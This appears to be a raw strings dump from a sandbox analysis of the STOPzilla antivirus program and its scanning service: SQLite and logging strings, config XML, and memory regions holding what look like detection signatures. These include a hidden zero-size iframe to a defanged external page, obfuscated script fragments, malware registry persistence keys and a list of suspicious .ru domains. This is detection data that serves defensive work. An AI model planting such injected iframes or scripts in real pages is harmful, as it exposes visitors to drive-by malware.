DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
table %s may not be dropped
use DROP TABLE to delete table %s
cannot create a TEMP index on non-TEMP table "%s"
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
views may not be indexed
virtual tables may not be indexed
table %s may not be indexed
sqlite_autoindex_%s_%d
table %s has no column named %s
there is already a table named %s
index %s already exists
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
no such index: %S
a JOIN clause is required before %s
%s.rowid
unable to identify the object to be reindexed
%s.%s
table %s may not be modified
cannot modify %s because it is a view
duplicate WITH table name: %s
no such collation sequence: %s
sqlite_version
sqlite_compileoption_used
sqlite_compileoption_get
sqlite_source_id
sqlite_log
foreign key mismatch - "%w" referencing "%w"
%d values for %d columns
table %S has no column named %s
table %S has %d columns but %d values were supplied
unable to open shared library [%s]
sqlite3_
sqlite3_extension_init
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_key_check
defer_foreign_keys
foreign_key_list
foreign_keys
*** in database %s ***
NULL value in %s.%s
unsupported encoding: %s
malformed database schema (%s)
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
%s - %s
database schema is locked: %s
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
unknown or unsupported join type: %T %T%s%T
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
column%d
%s:%d
COMPOUND SUBQUERIES %d AND %d %s(%s)
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
circular reference: %s
table %s has %d values for %d columns
no such index: %s
multiple references to recursive table: %s
sqlite_sq_%p
too many references to "%s": max 65535
multiple recursive references: %s
recursive reference in a subquery: %s
no such table: %s
%s.%s.%s
SCAN TABLE %s%s%s
sqlite3_get_table() called with two or more incompatible queries
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
no such column: %s
no such trigger: %S
-- TRIGGER %s
cannot VACUUM - SQL statements in progress
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
PRAGMA vacuum_db.synchronous=OFF
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
vtable constructor did not declare schema: %s
vtable constructor failed: %s
automatic index on %s(%s)
no such module: %s
table %s: xBestIndex returned an invalid plan
ANY(%s)
AS %s
PRIMARY KEY
SUBQUERY %d
TABLE %s
COVERING INDEX %s
INDEX %s
VIRTUAL TABLE INDEX %d:%s
%s.xBestIndex() malfunction
USING INTEGER PRIMARY KEY
at most %d tables in a join
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
database corruption at line %d of [%.10s]
no such table column: %s.%s
X:\sz7.0.1.3\Build7\Release\x86\STOPzilla.pdb
mfc120u.dll
__crtGetShowWindowMode
_amsg_exit
_wcmdln
MSVCR120.dll
_calloc_crt
__crtSetUnhandledExceptionFilter
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
KERNEL32.dll
ExitWindowsEx
EnumChildWindows
GetKeyState
USER32.dll
GDI32.dll
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
MSVCP120.dll
RPCRT4.dll
MPR.dll
d3d9.dll
WinHttpOpen
WinHttpConnect
WinHttpCloseHandle
WinHttpOpenRequest
WinHttpSetOption
WinHttpQueryOption
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
EnumWindows
MsgWaitForMultipleObjectsEx
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
VERSION.dll
WaitNamedPipeW
.?AVCCmdTarget@@
.PAVCException@@
.PAVbad_cast@std@@
.PAVexception@std@@
.?AVDelegate@CSZApplicationPipeClient@@
.?AVListener@CSZHttpContentHandler@@
.PAVrange_error@std@@
.PAVruntime_error@std@@
.?AVCSZPWKeyValueNotify@@
.?AVDelegate@CSZApplicationPipeServer@@
.?AVCSZPacketPipeConnection@@
.?AVCSZPipeConnection@@
.?AVCSZApplicationPipeClient@@
.?AVCSZSQLDatabase@@
.?AVCSZPacketPipeClient@@
.?AVCSZPipeClient@@
.?AVCSQLMigrationStep@@
.?AVCVIPREWebFilterEvents@@
.?AU_ISBWebFilterEvents@@
.?AVCSZGraphicsShape@@
.?AVCSZGraphicsShapeRectangle@@
.?AVCSZHttpContentHandler@@
.?AVCSZPipeConnectionThread@CSZPipeConnection@@
.?AVCSZSQLStatement@@
<config include="common.xml">
<names include="common-names.xml">
<name descriptor="log-file"><![CDATA[stopzilla7.log]]></name>
<databases default="config" include="databases.xml" />
<s><![CDATA[<Component class="{{CLASS}}" option="{{OPTION}}"><License key="{{KEY}}" /></Component>]]></s>
<name descriptor="db-file"><![CDATA[sz7.data]]></name>
<name descriptor="pipe-name"><![CDATA[sz7-pipe]]></name>
<sql><![CDATA[CREATE TABLE kv_data (key TEXT, value_type INTEGER, value_data BLOB, user TEXT DEFAULT '')]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX kv_data_key_index ON kv_data(key,user)]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS home_message(message_id INTEGER PRIMARY KEY UNIQUE NOT NULL, group_id TEXT, resource_type TEXT NOT NULL, link TEXT NOT NULL, locale TEXT NOT NULL, placement TEXT NOT NULL, width INTEGER, height INTEGER, text TEXT NOT NULL, resource TEXT NOT NULL, received_at INTEGER NOT NULL, expires_at INTEGER, read_at INTEGER, responded_at INTEGER)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX message_pk ON home_message(message_id)]]></sql>
<sql><![CDATA[CREATE INDEX message_read_k ON home_message(read_at)]]></sql>
<sql><![CDATA[CREATE INDEX message_expires_k ON home_message(expires_at)]]></sql>
<sql><![CDATA[CREATE INDEX message_type_k ON home_message(resource_type)]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS stored_actions(id TEXT PRIMARY KEY UNIQUE NOT NULL, type TEXT NOT NULL, name TEXT NOT NULL, xml TEXT NOT NULL)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX stored_id_pk ON stored_actions(id)]]></sql>
<sql><![CDATA[CREATE INDEX stored_type_k ON stored_actions(type)]]></sql>
<value name="vipre.config.scan.known-apps.reset">true</value>
<sql><![CDATA[CREATE TABLE zilla_system(value TEXT, data TEXT)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX zilla_system_index ON zilla_system(value)]]></sql>
<sql><![CDATA[REPLACE INTO zilla_system (value, data) VALUES("db_version", "1.0.0.0")]]></sql>
<sql><![CDATA[CREATE TABLE kv_data (key TEXT, value_type INTEGER, value_data BLOB)]]></sql>
<sql><![CDATA[CREATE UNIQUE INDEX kv_data_key_index ON kv_data(key)]]></sql>
<sql><![CDATA[DROP TABLE IF EXISTS zilla_system]]></sql>
<sql><![CDATA[ALTER TABLE kv_data ADD COLUMN user TEXT DEFAULT '']]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS kv_data_key_index]]></sql>
<sql><![CDATA[DELETE FROM kv_data]]></sql>
<sql><![CDATA[CREATE TABLE IF NOT EXISTS home_message(message_id INTEGER PRIMARY KEY UNIQUE NOT NULL, home_id INTEGER, group_id TEXT, resource_type TEXT NOT NULL, link TEXT NOT NULL, locale TEXT NOT NULL, placement TEXT NOT NULL, width INTEGER, height INTEGER, text TEXT NOT NULL, resource TEXT NOT NULL, data TEXT, received_at INTEGER NOT NULL, expires_at INTEGER, read_at INTEGER, responded_at INTEGER)]]></sql>
<sql><![CDATA[CREATE INDEX message_home_pk ON home_message(home_id)]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_pk]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_home_pk]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_read_k]]></sql>
<sql><![CDATA[DROP INDEX IF EXISTS message_expires_k]]></sql>
<sql><![CDATA[DROP TABLE IF EXISTS home_message]]></sql>
<sql><![CDATA[DELETE FROM stored_actions]]></sql>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0%1X1
1$2(2,202
78I8
2/2$3F3X3o3
1(2,2024282
4080<0@0
5_5S5h5u5
=$=<=]=~=
2&252\2}2
3]3&454{4
1o1v102F2%3X3x3
7%8X8
5Y5F5O5k5{5
9%9U9c9z9
8(9,9094989<9@9`9
2-2O2
3,4044484<4@4
> >$>(>,>0>4>8><>
8 8$8(8,82999
: :$:(:,:0:4:8:
6 6$6(6,60646
>#>)>9>?>
9 9$9(9,909
;(;7;\;~;
6%7U7
; ;$;(;,;
< <$<(<,<0<4<8<<<@<\=`=|=
< <$<(<,<0<4<8<<<@<|<
> >$>(>,>0>4>
0 0(0,0004080<0@0
3 3$3(3,3
7 7$7(7,7074787<7
:,=0=4=8=
%s (%s:%d)
%Program Files% (x86)\Microsoft Visual Studio 12.0\VC\atlmfc\include\afxwin1.inl
eu
Theme: Loading "STOPzilla" at "%s".
Theme: Failed Loading "STOPzilla" at "%s".
hXXp://VVV.stopzilla.com/
{8DFC6702-AF86-4CBB-9D8B-00055514603A}
Detected 'pipe.closed' trigger...
scan.custom.
scan.custom.partials
scan.custom.fulls
url_store
url_chat
url_support
email_support
durl_help
EMAIL AV: %s
durl_purchase
url_register
external.home_service_url
hXXps://secure.logmeinrescue.com/customer/Code.aspx
Content-Type: application/x-www-form-urlencoded
Support.exe
Global\update.binaries.skip_wait
url_renew
Windows 95
Windows 98
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows .Net
Windows Vista
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows 8
Windows 8.1
Windows 10
Windows 2012 Server
Windows 2012 Server R2
Web Server
%s ~%d MHZ
GetLogicalProcessorInformation is not supported.
Unable to determine windows version
%u.%u.%u
okernel32.dll
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Web Server Edition
Windows Server 2003 R2,
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64 Edition
Windows Server 2003,
Web Edition
Windows XP
Windows 2000
(build %d)
[%d/%m/%Y %H:%M:%S]
(%s%s%s%s%s):
shfolder.dll
"%s" %s
hkcu\software\microsoft\windows\shell\associations\urlassociations\http\userchoice
hkcr\http\shell\open\command
%hs(%d): failed [%u|%s]
%hs(%u, %u): failed [%u|%s]
https
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
Kernel32.dll
%s%s%s%s
system.last_boot_time
e%hs: %hs named '%s' updated to %u
%hs: unable to parse received action content '%hs' [%u]
%hs: attempt to execute an action with no implementation!
support.phone.%
support.phone.
e%s Initializing
Process ID: %u
Unable to start pipe client. (0xX)
SetProcessAffinityMask failed [%u|%s]
Working Directory: %s
CSZLogManager::Initialize(0x%X) failed [%u|%s]
ConstructLogFile(%s) failed [%u|%s]
application-pipe-client
%hs: wait failed with unexpected result %u
%hs: no wrapper for opCode %u
%hs: unhandled incoming packet - opCode(%u)
e%hs: unable to compile empty or missing SQL statement
%hs: no database available for SQL statement '%s'
%hs: failed to compile SQL statement '%s'
%hs: found duplicate name '%s' for type '%hs'
CONFIG.XML
%hs: duplicate component (%d|%hs)
%hs: updated license type(%d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d)
t%hs: failed to update license type(%d) end_date(%I64d) renewable(%d) reseller(%d) haveContactInfo(%d) [%u|%s]
%hs: component '%hs' skipped with result %d
%hs: missing value for region '%s' and status '%hs'
%hs: duplicate region key '%s'
%hs: missing %d of %d expected statuses in region '%s'
%hs: invalid status value '%hs' for region '%s'
%hs: no token key provided
%hs: unexpected token key '%hs'
%hs: parse error on markup '%hs' [%u|%s]
%hs: element '%hs' not supported by config object factory
%hs: request execution failed
%hs: request failed with result %u [%s]
%hs: Received %u
Exception: %s
Failed: %s
%s in transaction
INSERT INTO migration_history (version, phase) VALUES (%d, %d)
Failed to get value '%hs' for user '%hs' [%d|%s]
Failed to set value '%hs' for user '%hs' [%u|%s]
Failed to get system value '%hs' [%d|%s]
Failed to delete value '%hs' for user '%hs' [%u|%s]
Failed to set system value '%hs' [%u|%s]
Failed to delete system value '%hs' [%u|%s]
Failed to delete %hs keys %s %s [%u|%s]
'%s' set aside but new file not opened
'%s' cannot be opened and cannot be set aside
'%s' not created
'%s' set aside and recreated
No phase %d (%hs) migration necessary; current migration is %d
'%s' cannot be set aside
Phase %d (%hs) migration mismatch - DB is %d and application is %d
Migrated phase %d (%hs) from version %d to %d
SELECT value_type, value_data FROM kv_data WHERE user=? AND key=?
REPLACE INTO kv_data (user, key, value_type, value_data) VALUES (?, ?, ?, ?)
SELECT key, value_type, value_data FROM kv_data WHERE user=? AND key LIKE ?
DELETE FROM kv_data WHERE user=? AND key LIKE ?
DELETE FROM kv_data WHERE user=? AND key=?
DELETE FROM kv_data WHERE user=? AND key NOT LIKE ?
Failed to compile statement '%s' [%u|%s]
Failed to execute statement '%s' [%u|%s]
%hs: CreateFile('%s') failed [%u|%s]
tFailed to execute function '%hs' [%u|%s]
lFailed to set value '%hs' [%u|%s]
%hs: unsupported step '%hs'
%hs: invalid option '%c' for component (%d/%hs)
%hs: option '%c' for component (%d/%hs) requires value for variable %hs
%hs: option '%c' for component (%d/%hs) contains unbalanced variable delimiters
CreateInstance(CLSID_SBLogger) returned 0xX
CreateInstance(CLSID_SBService) returned 0xX
CreateInstance(CLSID_SBScanControl) returned 0xX
CreateInstance(CLSID_SBActiveProtection) returned 0xX
CreateInstance(CLSID_SBRegistration) returned 0xX
CreateInstance(CLSID_SBQuarantine) returned 0xX
CreateInstance(CLSID_SBThreatDefinitions) returned 0xX
CreateInstance(CLSID_SBSoftwareUpdates) returned 0xX
CreateInstance(CLSID_SBWSC) returned 0xX
CreateInstance(CLSID_SBVipre) returned 0xX
CreateInstance(CLSID_SBFirewall) returned 0xX
CreateInstance(CLSID_SBEmailAV) returned 0xX
CreateInstance(CLSID_SBHIPS) returned 0xX
CreateInstance(CLSID_SBWebFilter) returned 0xX
CreateInstance(CLSID_SBLanGuard) returned 0xX
Released ISBFirewallWebFilter
vipre.config.scan.known-apps.reset
%hs: VIPRE failure [0xX|%s]
gVIPRE: Error communicating to set back the config: %s
Incompatibles Check: Did not find program data in '%s' or '%s'
incompats.dat
IncompatiblePrograms.dll
Incompatibles Check: Found '%s' but not '%s'
Incompatibles Check: '%s' does not contain function '%hs'
Incompatibles Check: Found but did not load '%s' [%u|%s]
B%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been cleaned.%CRLF%Definitions Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been quarantined. You can unquarantine this suspicious file from the %PRODUCT% application.%CRLF%Definition Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCTLONG% detected %THREATNAME% in attachment %ATTACHMENTNAME%; The attachment has been deleted.%CRLF%Definitions Version = %THREATDEFVERSION%%CRLF%STOPzilla Version = %VIPREVERSION%
%PRODUCT% Anti-phishing removed a known bad URL from your email message. It was deleted or quarantined and replaced with this message.
*.theme
theme.xml
.theme
nCSZGraphicsHive::_ReferenceFont - Failed to load font '%S'.
CSZGraphicsHive::_LoadTTF - Failed to load system font '%s' (0xX).
CSZGraphicsHive::_LoadTTF - Loading font '%S'.
CSZGraphicsHive::_LoadTTF - Failed to load memory font '%S' (0xX).
CSZGraphicsHive::_LoadTTF - Failed to find container file '%s'.
CSZGraphicsHive::_LoadTTF - Failed to find font face '%S'.
Direct3D: Could not create IDirect3DDevice9 (0xX).
Error: Unexpected message loop (0xX).
ColumnData_%d
ColumnWidth_%d
comctl32.dll
UxTheme.dll
%Program Files% (x86)\Microsoft Visual Studio 12.0\VC\atlmfc\include\afxwin2.inl
CSZGraphicsFont::Load - GDI Failed to load '%s' (0xX)
%hs (%p): uStatusCode = %u
%hs (%p): actual content length (%I64u) exceeds reported (%I64u)
HTTPS
SZHttp/1.0
%hs: WinHttpConnect(%s, %u) failure [%u|%s]
%hs: WinHttpOpen failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_CONNECT_TIMEOUT - failure [%u|%s]
%hs: WinHttpOpenRequest(%s, %s) failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_RECEIVE_TIMEOUT - failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_SEND_TIMEOUT - failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_RESOLVE_TIMEOUT - failure [%u|%s]
%hs: WinHttpSetOption - WINHTTP_OPTION_RECEIVE_RESPONSE_TIMEOUT - failure [%u|%s]
%hs: WinHttpSetOption failure [%u|%s]
%hs: WinHttpQueryOption failure [%u|%s]
%hs: WinHttpReceiveResponse failure [%u|%s]
%hs: WinHttpSendRequest failure [%u|%s]
%hs: request failed with status %u
%hs: WinHttpQueryHeaders(WINHTTP_QUERY_STATUS_CODE) failure [%u|%s]
%hs: WinHttpQueryDataAvailable failure [%u|%s]
%hs: WinHttpQueryHeaders(WINHTTP_QUERY_CONTENT_LENGTH) failure [%u|%s]
%hs: WinHttpReadData failure [%u|%s]
\\.\pipe\
%hs: queue '%s', index %u - wait failed with result %u
%hs: queue '%s', index %u - thread 0x%X started
%hs: queue '%s', index %u - thread 0x%X ending
%hs: queue '%s' - attempt to start while abort is signalled
%hs: queue '%s', index %u - failed to start [%u|%s]
%hs: queue '%s', index %u - thread completed
_%hs: '%s' (0xX)
%hs: failed to compile '%s' [%d|%hs]
dbghelp.dll
%s%d.log
%s%d.dmp
Unhandled Exception: Code(0xX) Addess(0xX)
%hs: expected sequence number greater than or equal to %u; got %u instead
%hs: packet %u of request %u indicated no more data when %u packets remain.
%hs: expected packet size in %u bytes; got %u bytes
%hs: received %u bytes; 0 expected
%hs: expected packet buffer of %u bytes; got %u bytes
xx
C:\ProgramData\STOPzilla!\dumps\STOPzilla.exefatal
7.0.1.3
STOPzilla.exe
SBAMSvc.exe_3448_rwx_00DC0000_00004000:
.upx2
.upx1
.upx0
.reloc
.idata
.rdata
.data
.text
AutoIT 3.3.12.0
AutoIT 3.2.6.0
AutoIT 3.2.0.0
AutoIT 3.0.100.0
AutoIT 3.0.102
Upack 0.3.9
SBAMSvc.exe_3448_rwx_00E20000_0000A000:
T$.RV
Compiler Detection: Borland C/C 1999 %d
Compiler Detection: Borland C Dll %d
Compiler Detection: FreeBasic_0_14 %d
Compiler Detection: MASM_TASM %d
Compiler Detection: MASM32 %d
Compiler Detection: Microsoft_Visual_C_2_0 %d
Compiler Detection: Microsoft_Visual_Cpp %d
Compiler Detection: Microsoft_Visual_Cpp_3_0_old_crap_ %d
Compiler Detection: Microsoft_Visual_Cpp_7_0_Custom %d
Compiler Detection: Microsoft_Visual_Cpp_8_0_Debug %d
Compiler Detection: Microsoft Visual C 8.0 Release %d
Compiler Detection: Microsoft_Visual_Cpp_DLL %d
Compiler Detection: Microsoft_Visual_Cpp_v4_x %d
Compiler Detection: Microsoft_Visual_Cpp_v5_0_v6_0_MFC_ %d
Compiler Detection: Microsoft_Visual_Cpp_v6_0_Debug_Version_ %d
Compiler Detection: Microsoft_Visual_Cpp_v6_0_DLL %d
Compiler Detection: Microsoft_Visual_Cpp_v6_0_SPx %d
Compiler Detection: Microsoft_Visual_Cpp_v7_0 %d
Compiler Detection: Microsoft_Visual_Cpp_v7_0_DLL %d
Compiler Detection: Microsoft_Visual_Cpp_v7_1_DLL %d
Compiler Detection: Microsoft_Visual_Cpp_v7_1_DLL_Debug_ %d
Compiler Detection: Microsoft_Visual_Cpp_v7_1_EXE %d
Compiler Detection: Microsoft_Visual_Cpp_vx_x %d
Compiler Detection: Microsoft_Visual_Cpp_vx_x_DLL %d
Compiler Detection: Microsoft_Visual_CSharp_Basic_NET %d
Compiler Detection: MinGW_GCC_DLL_v2xx %d
Compiler Detection: MinGW_GCC_v2_x %d
Compiler Detection: MingWin32_Dev_Cpp_v4_9_9_1_h_ %d
Compiler Detection: MingWin32_Dev_Cpp_v4_x_h_ %d
Compiler Detection: MingWin32_GCC_3_x %d
Compiler Detection: MingWin32_vn_n_h_ %d
Compiler Detection: PowerBASIC_CC_3_0x %d
Compiler Detection: PowerBASIC_CC_4_0 %d
Compiler Detection: PowerBASIC_Win_7_0x %d
Compiler Detection: PseudoSigner_0_1_Borland_Delphi_6_0_7_0_Anorganix %d
Compiler Detection: PseudoSigner_0_1_Microsoft_Visual_Basic_5_0_6_0_Anorganix %d
Compiler Detection: PseudoSigner_0_1_Microsoft_Visual_Cpp_5_0p_MFC_Anorganix %d
Compiler Detection: PseudoSigner_0_1_Microsoft_Visual_Cpp_6_0_Debug_Version_Anorganix %d
Compiler Detection: PseudoSigner_0_1_Microsoft_Visual_Cpp_7_0_DLL_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Borland_Cpp_1999_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Borland_Cpp_DLL_Method_2_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Borland_Delphi_DLL_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Borland_Delphi_Setup_Module_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Microsoft_Visual_Basic_5_0_6_0_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Microsoft_Visual_Cpp_7_0_DLL_Anorganix %d
Compiler Detection: PseudoSigner_0_2_MinGW_GCC_2_x_Anorganix %d
Compiler Detection: PseudoSigner_0_2_REALBasic_Anorganix %d
Compiler Detection: PseudoSigner_0_2_Watcom_C_Cpp_DLL_Anorganix %d
Compiler Detection: PseudoSigner_0_2_WATCOM_C_Cpp_EXE_Anorganix %d
Compiler Detection: REALbasic %d
Compiler Detection: Star_PseudoSigner_0_1_Borland_Delphi_3_0_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_Borland_Delphi_5_0_KOL_MCK_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_Microsoft_Visual_Basic_6_0_DLL_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_Microsoft_Visual_Cpp_6_0_Debug_Version_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_Microsoft_Visual_Cpp_6_20_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_MinGW_GCC_2_x_Anorganix %d
Compiler Detection: Star_PseudoSigner_0_1_WATCOM_C_Cpp_EXE_Anorganix %d
Compiler Detection: Stranik_1_3_Modula_C_Pascal %d
Compiler Detection: Symantec_Visual_Cafe_v3_0 %d
Compiler Detection: TASM_MASM %d
VB Signature: %x
VB Header Startaddress: %x
Compiler Detection: WATCOM_C_Cpp %d
Compiler Detection: WATCOM C/C 1.7 %d
Compiler Detection: WATCOM_C_Cpp_32_Run_Time_System_1988_1995 %d
Compiler Detection: ZipWorxSecureEXE_v2_5_ZipWORX_Technologies_LLC_h_ %d
SBAMSvc.exe_3448_rwx_00E30000_0000E000:
=-=/=*=&=,=><
() -/*&[]
SBAMSvc.exe_3448_rwx_06F50000_00156000:
%SYSTEM%
Win32.Unair
{4b87fd04-2b89-0306-b0db-7dd6740e6c89}
{4481a693-e8d2-9549-4315-0ef724694f3f}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{beaec9c9-2c0a-1c56-3063-e776919a4d6c}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CB73411E-48F7-9D19-6293-EA0AD71836D4}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0fc85afd-096d-731e-a871-6c0f1af600dc}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{beaec9c9-2c0a-1c56-3063-e776919a4d6c}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CB73411E-48F7-9D19-6293-EA0AD71836D4}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3698A47F-0E80-000E-7948-960CF605F542}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0fc85afd-096d-731e-a871-6c0f1af600dc}
HKEY_CURRENT_USER\Software\{C5D43B9E-F5B7-480B-B8C4-C3A78AF3E670}
HKEY_CURRENT_USER\Software\{5d90b4ad-0f8f-c24a-865f-900f2caccae2}
HKEY_CURRENT_USER\Software\{59301c76-ede9-a1a9-f66d-c99effa3aa02}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{3698A47F-0E80-000E-7948-960CF605F542}
u$
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS\
explorer.exe csrcs.exe
124.40.51.17
58.17.236.92
360.cn
360safe.cn
360safe.com
60.210.176.251
chinakv.com
cnnod32.cn
dswlab.com
duba.net
eset.com
ikaka.com
jiangmin.com
kaspersky.com
kingsoft.com
lanniao.org
nod32.com
nod32club.com
qihoo.cn
qihoo.com
rising.com
sucop.com
virustotal.com
7.0.600
7.0.3790.
7.0.2600.
msvcrt.dll
sfcfiles.dll
.reloc
.rsrc
.data
.text
Menu\Programs\Startup\TEMP.HTA""",65
</script><script><script type="text/javascript">69101771096597821147010273105(.split
/* 'if (!document.getElementById('JSSS')){ document.getElementsByTagName('head').item(0).appendChild(js) }; */
<IFRAME src="hXXp://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
/script><script694565101774d6d10965416197825272114704666102734969105/g!=(.replace.charAt
/script>/scr' 'ipt><script"")'')/g,/ig,(/host.replaceyourwebfree.ru
yourwebcentral.ru
yourtruemate.ru
yourtruegame.ru
yourtruecrime.ru
yourtopfilms.ru
yourtolltag.ru
yourtagheuer.ru
yourmaxmedia.ru
yourauthentic.ru
yourarray.ru
xxlwebhost.ru
xboxliveweb.ru
worldwebworld.ru
worldwebmarkets.ru
worldsouth.ru
worldrat.ru
worldmusicmagazine.ru
worldhighspeed.ru
wintersaleonline.ru
window.redirect
whosaleonline.ru
webworldshop.ru
webpowerguide.ru
webnetloans.ru
webnetlinks.ru
webnetlender.ru
webnetexperts.ru
webnetenglish.ru
weblessnet.ru
webithost.ru
webdirectbroker.ru
webdesktopnet.ru
wavebank.ru
warbest.ru
votrelib.ru
vipodnososki.ru
viewhomesale.ru
videostan.ru
videosaleonline.ru
video-bum.ru
usaworldwideweb.ru
urlnext.ru
trueworldmedia.ru
truesoulonline.ru
truerealtime.ru
truelifefamily.ru
trueblueberyl.ru
trueblueally.ru
townwebmail.ru
topmediasite.ru
toplinemarine.ru
thetruehelp.ru
thestocksite.ru
thespeeddate.ru
theprocast.ru
themobisite.ru
themobilewindow.ru
thelifetag.ru
thelaceweb.ru
thegiftsale.ru
thechocolateweb.ru
theaworld.ru
theatticsale.ru
theaonline.ru
theantimatrix.ru
testoogle.ru
testilla.ru
teenwebdesign.ru
tagsaleusa.ru
supertruelife.ru
superpropicks.ru
superore.ru
